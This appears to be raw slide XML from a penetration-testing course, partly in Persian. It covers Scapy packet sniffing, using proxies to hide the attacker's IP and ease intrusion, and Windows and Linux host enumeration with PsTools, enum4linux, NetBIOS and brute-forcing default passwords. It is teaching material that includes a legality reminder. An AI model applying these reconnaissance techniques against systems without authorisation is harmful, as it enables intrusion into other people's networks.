              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>L4 = TCP(sport=564, dport=21, flags=”A”)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send = sendp(L2/L3/L4)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sniff(iface=”eth0”, prn=lambda x: x.show())</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a=sniff(filter=”host 192.168.1.1”, count=5)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a.nsummary()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Finish with Ctrl + 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استفاده از پروکسی برای حمله</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45" name="Google Shape;245;p41"/>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1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ما خودمون نینجاییم</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>سه دلیل اصلی:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>مخفی کردن آی پی</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>به نظر برسه از جای دیگه اومدیم (که حتی شاید دسترسی بهتری داره)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>مسیر نفوذ راحتتر می شه. مثلا نصب پراکسی روی DMZ</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Proxy workbench</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Squid</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Privoxy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>می تونین روی اینترنت پیدا کنین، چه با سرچ چه با اسکن</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Proxy switcher</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>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Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701200" y="2005700"/>
            <a:ext cx="3640800" cy="24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Enumeration is the process of extracting information from a target system to determine more of the configuration and environment present. In many cases it is possible to extract information such as usernames, machine names, shares, and services from a system as 	well as other information, depending on the OS itself.</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More information, more opportunity!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Check the LEGALITY!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;p42"/>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We will need active connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>All devices do have info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>info:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Network resources and shares</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Users and groups</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Routing tables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Auditing and service settings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Machine names</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Applications and banners</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SNMP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DNS, NTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Active Directory, LDAP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>NetBIOS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Default Passwords / Brute force</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>….</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="16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3"/>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Windows</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;p43"/>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Users</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Groups</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security Identifiers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Concept</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Decoding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Location</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PsTools command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PsExec (execute remotely)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PsFile (display opened files remotely)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PsInfo (get info from remote server)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PsKill</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PsLoggedOn</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PsPasswd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>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Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;p44"/>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Users</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Services and ports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Everything is file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Various commands like</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>finger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cpinfo </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>howmount</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enum4linux (uses samba)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NetBios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70" name="Google Shape;270;p45"/>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Very old and still present as netbios over tcp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Info like Computers, shares, services</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You can check with nmap for netbios</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
